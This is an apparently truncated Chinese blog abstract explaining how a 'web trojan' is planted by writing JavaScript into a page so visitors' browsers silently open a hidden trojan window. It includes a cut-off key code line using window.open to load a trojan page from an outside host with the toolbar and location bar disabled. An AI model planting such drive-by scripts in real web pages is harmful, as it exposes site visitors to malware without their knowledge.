摘要： 一种是直接将JavaScript脚本代码写在网页中，当访问者在浏览网页时，恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口，隐藏地运行。 这种方法使用的关键代码如下： window.open("http://www.123.com/木马.html","","toolbar=no,location 阅读全文